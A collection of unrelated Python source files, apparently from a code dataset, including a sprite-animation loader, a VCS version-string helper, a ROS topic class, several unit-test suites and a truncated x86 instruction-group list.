# EXPORT
class AnimationSequence(object):
def __init__(self, name, base_vel=1.0):
self.name = name
self.base_vel = base_vel
self.sprites = []
def add_sprite(self, sprite):
self.sprites.append(sprite)
def deserialize(self, filename, seq):
self.sprites = []
for frame in seq['Frames']:
self.add_sprite(Sprite.deserialize(filename, frame))
def __getitem__(self, index):
return self.sprites[index]
def __len__(self):
return len(self.sprites)
# EXPORT
class StaticSprite:
def __init__(self, sprite=None):
self.sprite = sprite
def get_current_sprite(self):
return self.sprite
def get_rect(self):
if self.sprite:
return self.sprite.get_rect()
return Rect(0, 0, 32, 32)
def draw(self, pos):
if self.sprite:
self.sprite.draw(pos)
# EXPORT
class AnimatedSprite(object):
def __init__(self):
self.sheet = None
self.sequences = {}
self.flags = {}
self.active_sequence = None
self.cur_sprite = 0
self.dt = 0.0
self.anim_dir = ''
def add_flag(self, name, value):
if name == 'AnimDir':
self.anim_dir = value
self.flags[name] = value
def get_longest_sequence(self):
mx = 0
res = None
for name in self.sequences:
seq = self.sequences.get(name)
if len(seq) > mx:
mx = len(seq)
res = seq
return res
def get_sequence_by_name(self, name):
return self.sequences.get(name)
def get_sequence_by_index(self, index):
for name in self.sequences.keys():
if index == 0:
return self.sequences.get(name)
index -= 1
return None
def get_active_sequence_name(self):
if not self.active_sequence:
return ''
return self.active_sequence.name
def set_active_sequence(self, name):
if name != self.get_active_sequence_name() and name in self.sequences:
self.active_sequence = self.sequences.get(name)
self.dt = 0.0
self.cur_sprite = 0
def add_sequence(self, seq):
self.sequences[seq.name] = seq
if not self.active_sequence:
self.active_sequence = seq
def calculate_axial_velocity(self, velocity):
if self.anim_dir == 'X':
return abs(velocity.x)
if self.anim_dir == 'Y':
return abs(velocity.y)
return velocity.length()
def advance(self, dt, velocity):
axial_velocity = self.calculate_axial_velocity(velocity)
# print "axial={}".format(axial_velocity)
if self.active_sequence and len(self.active_sequence) > 0:
mult = 1.0
if self.active_sequence.base_vel > 0 and axial_velocity > 0.001:
mult = axial_velocity / self.active_sequence.base_vel
# print "mult={}".format(mult)
self.dt = self.dt + dt * mult
# print "self.dt={}".format(self.dt)
if self.cur_sprite >= len(self.active_sequence):
self.cur_sprite = 0
spr = self.active_sequence[self.cur_sprite]
while self.dt >= spr.duration:
self.dt = self.dt - spr.duration
self.cur_sprite += 1
if self.cur_sprite >= len(self.active_sequence):
self.cur_sprite = 0
return True
def get_current_sprite(self):
if self.active_sequence:
return self.active_sequence[self.cur_sprite]
return None
def get_current_height(self):
spr = self.get_current_sprite()
if spr:
return spr.height()
return 0
def draw(self, position):
spr = self.get_current_sprite()
if spr:
spr.draw(position)
def get_rect(self):
spr = self.get_current_sprite()
if spr:
return spr.get_rect()
return Rect(0, 0, 1, 1)
def deserialize(self, obj, overrides):
filename = obj['Image']
flags = obj['Flags']
for key in flags:
self.add_flag(key, flags[key])
for seq in obj['Sequences']:
base_vel = seq['BaseVelocity']
if 'BaseVelocity' in overrides:
base_vel = overrides.get('BaseVelocity')
s = AnimationSequence(seq['Name'], base_vel)
s.deserialize(filename, seq)
self.add_sequence(s)
for name in sprite_sheets:
sprite_sheets.get(name).clean()
def load(self, filename, overrides={}):
return self.deserialize(json.load(open(filename, "r")), overrides)
# EXPORT
def load_json_file(filename):
obj = json.load(open(filename, "r"))
a = AnimatedSprite()
a.deserialize(obj)
return a
# EXPORT
def load_json_str(s):
obj = json.loads(s)
a = AnimatedSprite()
a.deserialize(obj)
return a
# EXPORT
def load_file(filename):
return load_json_file(filename)
# EXPORT
def load_str(s):
return load_json_str(s)
if __name__ == '__main__':
print(os.getcwd())
| 8,787 | 2,819 |
from abc import ABCMeta, abstractmethod
class Room(object):
"""class Room"""
__metaclass__ = ABCMeta
room_count = 0
def __init__(self, name=None, max_capacity=None):
self.room_id = self.room_count
self.room_count += 1
self.name = name
self.max_capacity = max_capacity
self.occupants = []
def add_occupant(self, occupant):
if self.is_full():
return false
self.occupants.append(occupant)
return True
def remove_occupant(self, occupant):
if self.is_an_occupant(occupant):
self.occupants.remove(occupant)
return True
return false
def is_an_occupant(self, occupant):
return occupant in self.occupants
def is_full(self):
return len(self.occupants) >= self.max_capacity
def __repr__(self):
return '%s(name=%s, purpose=%s, max_capacity=%s)' % (
self.__class__.__name__,
self.name,
self.purpose,
self.max_capacity
)
def __str__(self):
return Self.name
class OfficeSpace(Room):
"""class OfficeSpace """
def __init__(self, name=None, max_capacity=6):
Room.__init__(self, name=name, max_capacity=max_capacity)
self.purpose = "OFFICE"
class LivingSpace(Room):
"""class LivingSpace """
def __init__(self, name=None, max_capacity=4):
Room.__init__(self, name=name, max_capacity=max_capacity)
self.purpose = "LIVINGSPACE"
| 1,562 | 491 |
# Copyright (C) 2014 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from common.logger import Logger
from file_format.common import SplitStream
from file_format.c1visualizer.struct import C1visualizerFile, C1visualizerPass
import re
class C1ParserState:
OutsideBlock, InsideCompilationBlock, StartingCfgBlock, InsideCfgBlock = range(4)
def __init__(self):
self.currentState = C1ParserState.OutsideBlock
self.lastMethodName = None
def __parseC1Line(line, lineNo, state, fileName):
""" This function is invoked on each line of the output file and returns
a triplet which instructs the parser how the line should be handled. If the
line is to be included in the current group, it is returned in the first
value. If the line starts a new output group, the name of the group is
returned in the second value. The third value is only here to make the
function prototype compatible with `SplitStream` and is always set to
`None` here.
"""
if state.currentState == C1ParserState.StartingCfgBlock:
# Previous line started a new 'cfg' block which means that this one must
# contain the name of the pass (this is enforced by C1visualizer).
if re.match("name\s+\"[^\"]+\"", line):
# Extract the pass name, prepend it with the name of the method and
# return as the beginning of a new group.
state.currentState = C1ParserState.InsideCfgBlock
return (None, state.lastMethodName + " " + line.split("\"")[1], None)
else:
Logger.fail("Expected output group name", fileName, lineNo)
elif state.currentState == C1ParserState.InsideCfgBlock:
if line == "end_cfg":
state.currentState = C1ParserState.OutsideBlock
return (None, None, None)
else:
return (line, None, None)
elif state.currentState == C1ParserState.InsideCompilationBlock:
# Search for the method's name. Format: method "<name>"
if re.match("method\s+\"[^\"]*\"", line):
methodName = line.split("\"")[1].strip()
if not methodName:
Logger.fail("Empty method name in output", fileName, lineNo)
state.lastMethodName = methodName
elif line == "end_compilation":
state.currentState = C1ParserState.OutsideBlock
return (None, None, None)
else:
assert state.currentState == C1ParserState.OutsideBlock
if line == "begin_cfg":
# The line starts a new group but we'll wait until the next line from
# which we can extract the name of the pass.
if state.lastMethodName is None:
Logger.fail("Expected method header", fileName, lineNo)
state.currentState = C1ParserState.StartingCfgBlock
return (None, None, None)
elif line == "begin_compilation":
state.currentState = C1ParserState.InsideCompilationBlock
return (None, None, None)
else:
Logger.fail("C1visualizer line not inside a group", fileName, lineNo)
def ParseC1visualizerStream(fileName, stream):
c1File = C1visualizerFile(fileName)
state = C1ParserState()
fnProcessLine = lambda line, lineNo: __parseC1Line(line, lineNo, state, fileName)
fnLineOutsideChunk = lambda line, lineNo: \
Logger.fail("C1visualizer line not inside a group", fileName, lineNo)
for passName, passLines, startLineNo, testArch in \
SplitStream(stream, fnProcessLine, fnLineOutsideChunk):
C1visualizerPass(c1File, passName, passLines, startLineNo + 1)
return c1File
| 3,972 | 1,152 |
from __future__ import absolute_import
import logging
import os
import re
import subprocess
import six
LOGGER = logging.getLogger('natcap.versioner.versioning')
LOGGER.setLevel(logging.ERROR)
class VCSQuerier(object):
name = 'VCS'
is_archive = False
repo_data_location = ''
def __init__(self, repo_path):
repo_root = self._find_repo_root(repo_path)
if not repo_root:
raise ValueError('Not within a %s repository: %s' % (
self.name, repo_path))
self._repo_path = repo_root
def _find_repo_root(self, dirpath):
"""Walk up the directory tree and locate the directory that contains
the repo data."""
abs_repo_path = os.path.abspath(dirpath)
def _locate_data(path):
# base case: we can't go up another directory and still haven't
# found the repo data.
if os.path.dirname(path) == path:
return None
if os.path.exists(os.path.join(path, self.repo_data_location)):
return path
return _locate_data(os.path.dirname(path))
return _locate_data(abs_repo_path)
def _run_command(self, cmd, cwd=None):
"""Run a subprocess.Popen command.
All output to stdout, stdin and stderr will be treated as stdout,
captured, and returned. Commands are executed as shell commands.
Parameters:
cmd (string) - a python string to be executed in the shell.
cwd=None (string or None) - the string path to the directory on
disk to use as the CWD. If None, the current CWD will be
used.
Returns:
A python bytestring of the output of the given command."""
p = subprocess.check_output(
cmd, shell=True, stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
cwd=cwd)
return p.strip().decode('utf-8') # output without leading/trailing newlines
@property
def tag_distance(self):
raise NotImplementedError
@property
def build_id(self):
raise NotImplementedError
@property
def latest_tag(self):
raise NotImplementedError
@property
def branch(self):
raise NotImplementedError
@property
def node(self):
raise NotImplementedError
@property
def release_version(self):
"""This function gets the release version. Returns either the latest tag
(if we're on a release tag) or None, if we're on a dev changeset."""
if self.tag_distance == 0:
return self.latest_tag
return None
@property
def version(self):
"""This function gets the module's version string. This will be either the
dev build ID (if we're on a dev build) or the current tag if we're on a
known tag. Either way, the return type is a string."""
release_version = self.release_version
if release_version is None:
return self.build_dev_id(self.build_id)
return release_version
def build_dev_id(self, build_id=None):
"""This function builds the dev version string. Returns a string."""
if build_id is None:
build_id = self.build_id
return 'dev%s' % (build_id)
def pep440(self, branch=True, method='post'):
assert method in ['pre', 'post'], ('Versioning method %s '
'not valid') % method
# If we're at a tag, return the tag only.
if self.tag_distance == 0:
return self.latest_tag
template_string = "%(latesttag)s.%(method)s%(tagdist)s+n%(node)s"
if branch is True:
template_string += "-%(branch)s"
latest_tag = self.latest_tag
if method == 'pre':
latest_tag = _increment_tag(latest_tag)
data = {
'tagdist': self.tag_distance,
'latesttag': latest_tag,
'node': self.node,
'branch': self.branch,
'method': method,
}
version_string = template_string % data
return version_string
class HgArchive(VCSQuerier):
name = 'Mercurial Archive'
shortnode_len = 12
is_archive = True
repo_data_location = '.hg_archival.txt'
@property
def build_id(self):
attrs = _get_archive_attrs(self._repo_path)
return '{latesttagdistance}:{latesttag} [{node}]'.format(
latesttagdistance=attrs['latesttagdistance'],
latesttag=attrs['latesttag'],
node=attrs['node'][:self.shortnode_len],
)
@property
def tag_distance(self):
try:
return _get_archive_attrs(self._repo_path)['latesttagdistance']
except KeyError:
# This happens when we are at a tag.
return 0
@property
def latest_tag(self):
attrs = _get_archive_attrs(self._repo_path)
try:
return six.text_type(attrs['latesttag'])
except KeyError:
# This happens when we are at a tag.
return six.text_type(attrs['tag'])
@property
def branch(self):
return _get_archive_attrs(self._repo_path)['branch']
@property
def node(self):
return _get_archive_attrs(self._repo_path)['node'][:self.shortnode_len]
class HgRepo(VCSQuerier):
name = 'Mercurial'
is_archive = False
repo_data_location = '.hg'
def _log_template(self, template_string):
hg_call = 'hg log -r . --config ui.report_untrusted=False'
cmd = (hg_call + ' --template="%s"') % template_string
return self._run_command(cmd, cwd=self._repo_path)
@property
def build_id(self):
"""Call mercurial with a template argument to get the build ID. Returns a
python bytestring."""
return self._log_template('{latesttagdistance}:{latesttag} '
'[{node|short}]')
@property
def tag_distance(self):
"""Call mercurial with a template argument to get the distance to the latest
tag. Returns an int."""
return int(self._log_template('{latesttagdistance}'))
@property
def latest_tag(self):
"""Call mercurial with a template argument to get the latest tag. Returns a
python bytestring."""
return self._log_template('{latesttag}')
@property
def branch(self):
"""Get the current branch from hg."""
return self._log_template('{branch}')
@property
def node(self):
return self._log_template('{node|short}')
class GitRepo(VCSQuerier):
name = 'Git'
repo_data_location = '.git'
def __init__(self, repo_path):
VCSQuerier.__init__(self, repo_path)
self._tag_distance = None
self._latest_tag = None
self._commit_hash = None
def _run_command(self, cmd):
return VCSQuerier._run_command(self, cmd, self._repo_path)
@property
def branch(self):
branch_cmd = 'git branch'
current_branches = self._run_command(branch_cmd)
for line in current_branches.split('\n'):
if line.startswith('* '):
return line.replace('* ', '').strip()
raise IOError('Could not detect current branch')
def _describe_current_rev(self):
self._tag_distance = None
self._latest_tag = None
self._commit_hash = None
current_branch = self.branch
try:
data = self._run_command('git describe --tags')
except subprocess.CalledProcessError:
# when there are no tags
self._latest_tag = 'null'
num_commits_cmd = 'git rev-list %s --count' % current_branch
self._tag_distance = self._run_command(num_commits_cmd)
commit_hash_cmd = 'git log -1 --pretty="format:%h"'
self._commit_hash = self._run_command(commit_hash_cmd)
else:
if '-' not in data:
# then we're at a tag
self._latest_tag = str(data)
self._tag_distance = 0
commit_hash_cmd = 'git log -1 --pretty="format:%h"'
self._commit_hash = self._run_command(commit_hash_cmd)
else:
# we're not at a tag, so data has the format:
# data = tagname-tagdistange-commit_hash
tagname, tag_dist, _commit_hash = data.split('-')
self._tag_distance = int(tag_dist)
self._latest_tag = tagname
self._commit_hash = self.node
@property
def build_id(self):
self._describe_current_rev()
return "%s:%s [%s]" % (self._tag_distance, self._latest_tag,
self._commit_hash)
@property
def tag_distance(self):
self._describe_current_rev()
return self._tag_distance
@property
def latest_tag(self):
self._describe_current_rev()
return self._latest_tag
@property
def node(self):
return self._run_command('git rev-parse HEAD').strip()[:8]
@property
def is_archive(self):
# Archives are a mercurial feature.
return False
def _increment_tag(version_string):
assert len(re.findall('([0-9].?)+', version_string)) >= 1, (
'Version string must be a release')
# increment the minor version number and not the update num.
tag = [int(s) for s in version_string.split('.')]
tag[-1] += 1
return '.'.join([str(i) for i in tag])
def _get_archive_attrs(archive_path):
"""
If we're in an hg archive, there will be a file '.hg_archival.txt' in the
repo root. If this is the case, we can fetch relevant build information
from this file that we might normally be able to get directly from hg.
Parameters:
attr (string): The archive attr to fetch. One of
"repo"|"node"|"branch"|"latesttag"|"latesttagdistance"|"changessincelatesttag"
archive_path (string): The path to the mercurial archive.
The .hg_archival.txt file must exist right inside this directory.
Returns:
A dict of the attributes within the .hg_archival file.
Raises:
IOError when the .hg_archival.txt file cannot be found.
KeyError when `attr` is not in .hg_archival.txt
"""
archival_filepath = os.path.join(archive_path, '.hg_archival.txt')
attributes = {}
with open(archival_filepath) as archival_file:
for line in archival_file:
attr_name, value = line.strip().split(': ')
# Try to cast the attribute to an int (since it might be a
# revision number). If it doesn't cast, leave it as a string.
try:
value = int(value)
except ValueError:
pass
attributes[attr_name] = value
return attributes
| 10,882 | 3,210 |
from mopidy import utils
from tests import unittest
class GetClassTest(unittest.TestCase):
def test_loading_module_that_does_not_exist(self):
with self.assertRaises(ImportError):
utils.get_class('foo.bar.Baz')
def test_loading_class_that_does_not_exist(self):
with self.assertRaises(ImportError):
utils.get_class('unittest.FooBarBaz')
def test_loading_incorrect_class_path(self):
with self.assertRaises(ImportError):
utils.get_class('foobarbaz')
def test_import_error_message_contains_complete_class_path(self):
try:
utils.get_class('foo.bar.Baz')
except ImportError as e:
self.assertIn('foo.bar.Baz', str(e))
def test_loading_existing_class(self):
cls = utils.get_class('unittest.TestCase')
self.assertEqual(cls.__name__, 'TestCase')
| 878 | 289 |
from __future__ import print_function
import numpy as np
import random
import json
import sys
import os
import networkx as nx
from networkx.readwrite import json_graph
version_info = list(map(int, nx.__version__.split('.')))
major = version_info[0]
minor = version_info[1]
assert (major <= 1) and (minor <= 11), "networkx major version > 1.11"
if __name__ == "__main__":
graph_file = sys.argv[1]
#out_file = sys.argv[2]
G_data = json.load(open(graph_file))
#print(G_data)
G = json_graph.node_link_graph(G_data)
nodes = [n for n in G.nodes() if not G.node[n]["val"] and not G.node[n]["test"]]
G = G.subgraph(nodes)
count = 0
max_node_degree = 0
for count, node in enumerate(nodes):
if G.degree(node) == 0:
continue
else :
count += G.degree(node)
if G.degree(node)>max_node_degree:
max_node_degree = G.degree(node)
avg_node_degree = count/len(nodes)
print(len(nodes), avg_node_degree, max_node_degree)
print(nx.is_connected(G))
| 1,054 | 389 |
from asyncio import AbstractEventLoop
from asyncio import iscoroutinefunction
from asyncio import Event
from asyncio import IncompleteReadError
from asyncio import Queue
from asyncio import open_connection
from asyncio import open_unix_connection
from typing import Dict
from typing import List
from typing import Set
from typing import Tuple
from typing import Type
from genpy import Message
from ..api.node_api_client import NodeApiClient
from .protocol import Serializer
from .protocol import encode_header
from .protocol import read_data
from .protocol import read_header
from .publisher import Publisher
from .subscription import Subscription
class SubscriberInitError(Exception):
pass
class Topic:
def __init__(
self,
loop: AbstractEventLoop,
node_name: str,
topic_name: str,
msg_type: Type[Message]
) -> None:
self._loop = loop
self._node_name = node_name
self._topic_name = topic_name
self._msg_type = msg_type
self._connected_subscribers: Dict[str, Queue] = {}
self._connected_publishers: Dict[str, Event] = {}
self._has_connected_subscribers: Event = Event()
self._has_connected_publishers: Event = Event()
self._internal_subscriptions: Set[Subscription] = set()
self._internal_publishers: Set[Publisher] = set()
self._latched_msgs: Dict[Publisher, bytes] = {}
self._serializer: Serializer = Serializer()
@property
def name(self) -> str:
return self._topic_name
@property
def type(self) -> Type[Message]:
return self._msg_type
@property
def type_name(self) -> str:
return self._msg_type._type
@property
def md5sum(self) -> str:
return self._msg_type._md5sum
@property
def nr_connected_subscribers(self) -> int:
return len(self._connected_subscribers)
@property
def nr_connected_publishers(self) -> int:
return len(self._connected_publishers)
async def wait_for_connected_subscribers(self) -> None:
await self._has_connected_subscribers.wait()
async def wait_for_connected_publishers(self) -> None:
await self._has_connected_publishers.wait()
@property
def has_subscriptions(self) -> bool:
return bool(self._internal_subscriptions)
@property
def has_publishers(self) -> bool:
return bool(self._internal_publishers)
@property
def is_latching(self) -> bool:
return any(pub.latch for pub in self._internal_publishers)
def get_publisher_header(self) -> Dict[str, str]:
return dict(
topic=self.name,
type=self.type_name,
latching='1' if self.is_latching else '0',
message_definition=self.type._full_text,
md5sum=self.md5sum,
callerid=self._node_name)
def register_publisher(
self,
publisher: Publisher
) -> None:
self._internal_publishers.add(publisher)
async def unregister_publisher(
self,
publisher: Publisher
) -> bool:
self._latched_msgs.pop(publisher, None)
self._internal_publishers.discard(publisher)
return self.has_publishers
def register_subscription(
self,
subscription: Subscription
) -> None:
self._internal_subscriptions.add(subscription)
async def unregister_subscription(
self,
subscription: Subscription
) -> bool:
self._internal_subscriptions.discard(subscription)
if not self.has_subscriptions:
for event in self._connected_publishers.values():
event.set()
return self.has_subscriptions
def publish(
self,
publisher: Publisher,
msg: Message
) -> None:
if not self._connected_subscribers and not self.is_latching:
return
with self._serializer.serialize(msg) as serialized_msg:
for queue in self._connected_subscribers.values():
queue.put_nowait(serialized_msg)
if publisher.latch:
self._latched_msgs[publisher] = serialized_msg
async def connect_subscriber(
self,
node_name: str,
queue: Queue
) -> None:
for publisher in self._internal_publishers:
if publisher.on_peer_connect:
msg = publisher.on_peer_connect(node_name)
if msg:
with self._serializer.serialize(msg) as serialized_msg:
await queue.put(serialized_msg)
serialized_msg = self._latched_msgs.get(publisher)
if serialized_msg is not None:
await queue.put(serialized_msg)
self._connected_subscribers[node_name] = queue
self._has_connected_subscribers.set()
def disconnect_subscriber(
self,
node_name: str
) -> None:
for publisher in self._internal_publishers:
if publisher.on_peer_disconnect:
publisher.on_peer_disconnect(node_name)
del self._connected_subscribers[node_name]
if not self._connected_subscribers:
self._has_connected_subscribers.clear()
def connect_to_publishers(
self,
publishers: List[str]
) -> None:
publishers_set = set(publishers)
for publisher_uri in publishers:
if publisher_uri in self._connected_publishers:
continue
self._connected_publishers[publisher_uri] = Event()
self._loop.create_task(
self._subscribe(publisher_uri))
for publisher_uri in self._connected_publishers:
if publisher_uri not in publishers_set:
self._connected_publishers[publisher_uri].set()
async def _subscribe(
self,
publisher_uri: str
) -> None:
connection_params = await self._get_publisher_connection_params(
publisher_uri)
try:
if connection_params[0] == 'UNIXROS':
reader, writer = await open_unix_connection(
connection_params[1])
elif connection_params[0] == 'TCPROS':
reader, writer = await open_connection(
connection_params[1],
int(connection_params[2]))
header = dict(
topic=self.name,
message_definition=self.type._full_text,
tcp_nodelay='1',
md5sum=self.md5sum,
type=self.type_name,
callerid=self._node_name)
writer.write(encode_header(header))
await writer.drain()
header_dict = await read_header(reader)
if 'error' in header_dict:
raise SubscriberInitError(header_dict['error'])
self._has_connected_publishers.set()
while not self._connected_publishers[publisher_uri].is_set():
msg = self.type()
msg.deserialize(await read_data(reader))
for sub in self._internal_subscriptions:
if iscoroutinefunction(sub.callback):
self._loop.create_task(sub.callback(msg))
else:
self._loop.call_soon(sub.callback, msg)
except (ConnectionResetError, IncompleteReadError):
pass
finally:
writer.close()
if hasattr(writer, 'wait_closed'):
await writer.wait_closed()
self._connected_publishers.pop(publisher_uri)
if not self._connected_publishers:
self._has_connected_publishers.clear()
async def _get_publisher_connection_params(
self,
publisher_uri: str
) -> Tuple[str, int]:
client = NodeApiClient(self._node_name, publisher_uri)
topic = await client.request_topic(
self.name,
[['UNIXROS'], ['TCPROS']])
await client.close()
if topic[0] not in ('UNIXROS', 'TCPROS'):
raise ValueError('protocol is not supported')
return topic
| 8,167 | 2,297 |
import json
import os
import unittest
from opta.core.local import Local
from opta.layer import Layer
class LocalTests(unittest.TestCase):
def setUp(self) -> None:
self.layer = Layer(
name="testname",
org_name="testorg",
providers={"local": {"path": "/tmp"}},
modules_data=[],
path="/tmp",
parent=None,
)
self.local = Local(self.layer)
self.local.tf_file = "/tmp/tfconfig"
self.local.config_file_path = "/tmp/localconfig"
with open(self.local.config_file_path, "w") as f:
json.dump(
{
"opta_version": "dev",
"date": "2021-11-15T18:26:47.553097",
"original_spec": "",
"defaults": {},
},
f,
)
with open(self.local.tf_file, "w") as f:
f.write("Some tf state for testing")
return super().setUp()
def tearDown(self) -> None:
if os.path.isfile("/tmp/localconfig"):
os.remove("/tmp/localconfig")
if os.path.isfile("/tmp/tfconfig"):
os.remove("/tmp/tfconfig")
return super().tearDown()
def test_get_remote_config(self) -> None:
assert self.local.get_remote_config() == {
"opta_version": "dev",
"date": "2021-11-15T18:26:47.553097",
"original_spec": "",
"defaults": {},
}
def test_upload_opta_config(self) -> None:
self.local.upload_opta_config()
dict = json.load(open(self.local.config_file_path, "r"))
assert set(dict.keys()) == set(
["opta_version", "original_spec", "date", "defaults"]
)
def test_delete_remote_state(self) -> None:
self.local.delete_remote_state()
assert os.path.isfile(self.local.tf_file) is False
| 1,911 | 615 |
from environments.maze_env import MazeEnv
from environments.ant import AntEnv
class AntMazeEnv(MazeEnv):
MODEL_CLASS = AntEnv
| 132 | 45 |
import numpy as np # type: ignore
import pytest
from ladim2.state import State
# ------------
# __init__
# ------------
def test_init_minimal():
"""Init State with no arguments"""
S = State()
assert len(S) == 0
assert S.npid == 0
assert set(S.variables) == {"pid", "X", "Y", "Z", "active", "alive"}
assert S.instance_variables == {"pid", "X", "Y", "Z", "active", "alive"}
assert S.particle_variables == set()
assert S.pid.dtype == int
assert all(S.pid == [])
assert S.X.dtype == np.float64
assert all(S.variables["X"] == [])
assert all(S["X"] == [])
assert all(S.X == [])
assert S.Y.dtype == float
assert S.Z.dtype == "f8"
assert S.alive.dtype == bool
assert S.default_values["alive"]
def test_init_args():
"""Init State with extra variables"""
S = State(
instance_variables=dict(age=float, stage=int),
particle_variables=dict(release_time="time"),
default_values=dict(age=0, stage=1),
)
assert "age" in S.instance_variables
assert S.age.dtype == float
assert S.default_values["age"] == 0
assert S.stage.dtype == int
assert S.particle_variables == {"release_time"}
assert S.release_time.dtype == np.dtype("M8[s]")
assert S.dtypes["release_time"] == np.dtype("M8[s]")
assert all(S.release_time == np.array([], np.datetime64))
def test_override_mandatory():
S = State(instance_variables=dict(X="f4"))
assert S.X.dtype == np.float32
def test_set_default_err1():
"""Trying to set default for an undefined variable"""
with pytest.raises(ValueError):
State(particle_variables={"age": float}, default_values=dict(length=4.3))
def test_set_default_err2():
"""Trying to set default for pid"""
with pytest.raises(ValueError):
S = State(default_values=dict(pid=42))
def test_set_default_err3():
"""Trying to set an array as default value"""
with pytest.raises(TypeError):
S = State(
instance_variables=dict(length=float),
default_values=dict(length=[1.2, 4.3]),
)
# --------------------
# append
# --------------------
def test_append_scalar():
state = State()
state.append(X=200, Z=5, Y=100)
assert len(state) == 1
assert state.npid == 1
assert np.all(state.pid == [0])
assert np.all(state.active == [True])
assert np.all(state.alive == [True])
assert np.all(state.X == [200])
def test_append_array():
"""Append an array to a non-empty state"""
state = State()
state.append(X=200, Z=5, Y=100)
length = len(state)
npid = state.npid
state.append(X=np.array([201, 202]), Y=110, Z=[5, 10])
assert len(state) == length + 2
assert state.npid == npid + 2
assert np.all(state.pid == [0, 1, 2])
assert np.all(state["pid"] == [0, 1, 2])
assert np.all(state.variables["pid"] == [0, 1, 2])
assert np.all(state.active == 3 * [True])
assert np.all(state.alive == 3 * [True])
assert np.all(state.X == [200, 201.0, 202.0])
assert np.all(state["X"] == [200, 201.0, 202.0])
assert np.all(state.variables["X"] == [200, 201.0, 202.0])
assert np.all(state.Y == [100.0, 110.0, 110.0])
assert np.all(state.Z == [5.0, 5.0, 10.0])
def test_extra_instance_variables():
"""Append with extra instance variables, with and without default"""
state = State(
instance_variables=dict(age=float, stage="int"), default_values=dict(stage=1)
)
assert len(state) == 0
assert state.age.dtype == float
assert state.stage.dtype == int
state.append(X=[1, 2], Y=2, Z=3, age=0)
assert len(state) == 2
assert all(state.age == [0, 0])
assert all(state.stage == [1, 1])
def test_append_nonvariable():
"""Append an undefined variable"""
state = State()
with pytest.raises(ValueError):
state.append(X=1, Y=2, Z=3, length=20)
def test_append_missing_variable():
state = State()
# with pytest.raises(TypeError):
# Now Y becomes NaN, correct behaviour??
state.append(X=100, Z=10)
assert state.Y[0] != state.Y[0]
def test_append_missing_particle_variable():
state = State(particle_variables=dict(X_start=float))
# with pytest.raises(TypeError):
state.append(X=100, Y=200, Z=5)
assert state.X_start[0] != state.X_start[0]
def test_append_shape_mismatch():
state = State()
with pytest.raises(ValueError):
state.append(X=[100, 101], Y=[200, 201, 202], Z=5)
def test_missing_default():
state = State(
instance_variables=dict(age=float, stage=int), default_values=dict(age=0)
)
# No default for stage
# with pytest.raises(TypeError):
# state.append(X=1, Y=2, Z=3)
# changed behaviour: now check for NaN
state.append(X=1, Y=2, Z=3)
assert state.stage[0] != state.stage[0]
def test_not_append_pid():
"""Can not append to pid"""
S = State()
with pytest.raises(ValueError):
S.append(X=10, Y=20, Z=5, pid=101)
# ----------------
# Update
# ----------------
def test_variable_update():
"""Update a variable, low level"""
S = State()
S.append(X=[100, 110], Y=[200, 210], Z=5)
S.variables["X"] += 1
assert all(S.variables["X"] == [101, 111])
def test_update_item():
"""Item style variable update is OK"""
S = State()
S.append(X=[100, 110], Y=[200, 210], Z=5)
S["X"] += 1
assert all(S.variables["X"] == [101, 111])
def test_update_attr():
"""Attribute style assignment to variables is not allowed"""
S = State()
S.append(X=[100, 110], Y=[200, 210], Z=5)
with pytest.raises(AttributeError):
S.X += 1
def test_update_error_not_variable():
S = State()
S.append(X=[100, 110], Y=[200, 210], Z=5)
with pytest.raises(KeyError):
S["Lon"] = [4.5, 4.6]
def test_update_error_wrong_size():
# Alternative broadcast the scalar, equivalent to s["X"] = [110, 100]
S = State()
S.append(X=[100, 110], Y=[200, 210], Z=5)
with pytest.raises(KeyError):
S["X"] = 110
with pytest.raises(KeyError):
S["X"] = [101, 111, 121]
# --------------
# Compactify
# --------------
def test_compactify():
S = State(default_values=dict(Z=5))
S.append(X=[10, 11], Y=[1, 2])
assert len(S) == 2
S.append(X=[21, 22], Y=[3, 4])
assert len(S) == 4
# Kill second particle
S.alive[1] = False
S.compactify()
assert len(S) == 3
assert S.npid == 4
assert np.all(S.active)
assert np.all(S.alive)
assert np.all(S.pid == [0, 2, 3])
assert np.all(S.X == [10, 21, 22])
# The arrays should be contiguous after removing an element
assert S.X.flags["C_CONTIGUOUS"]
def test_not_compactify_particle_variables():
S = State(particle_variables=dict(X0=float), default_values=dict(Z=5))
X0 = [10, 11, 12, 13]
Y0 = [20, 21, 22, 23]
S.append(X=X0, Y=Y0, X0=X0)
S.alive[1] = False
S.compactify()
assert len(S) == 3
assert all(S.pid == [0, 2, 3])
assert all(S.X == [10, 12, 13])
# particle_variable X0 is not compactified
assert all(S.X0 == X0)
def test_update_and_append_and_compactify():
"""Check that updating bug has been fixed"""
S = State()
# One particle
S.append(X=100, Y=10, Z=5)
assert all(S.pid == [0])
assert all(S.X == [100])
# Update position
S["X"] += 1
assert all(S.pid == [0])
assert all(S.X == [101])
# Update first particle and add two new particles
S["X"] += 1
S.append(X=np.array([200, 300]), Y=np.array([20, 30]), Z=5)
assert all(S.pid == [0, 1, 2])
assert all(S.X == [102, 200, 300])
# Update particle positions and kill the first particle, pid=0
S["X"] = S["X"] + 1.0
S["alive"][0] = False
S.compactify()
assert all(S.pid == [1, 2])
assert all(S.X == [201, 301])
# Update positions
S["X"] = S["X"] + 1
assert all(S.pid == [1, 2])
assert all(S.X == [202, 302])
| 7,943 | 3,209 |
from django.db import models
# Create your models here.
class Friend(models.Model):
name = models.CharField(max_length=60)
email = models.CharField(max_length=60)
def __str__(self):
return self.name
| 220 | 68 |
from tiknib.feature.asm_ppc import PPC_GRP_MAP
# ==================== x86 32 =============================================
# data transfer
X86_GRP_DTRANSFER = [
# general purpose instructions
"CMOV",
"CMOVA",
"CMOVAE",
"CMOVB",
"CMOVBE",
"CMOVC",
"CMOVE",
"CMOVG",
"CMOVGE",
"CMOVL",
"CMOVLE",
"CMOVNA",
"CMOVNAE",
"CMOVNB",
"CMOVNBE",
"CMOVNC",
"CMOVNE",
"CMOVNG",
"CMOVNGE",
"CMOVNL",
"CMOVNLE",
"CMOVNO",
"CMOVNP",
"CMOVNS",
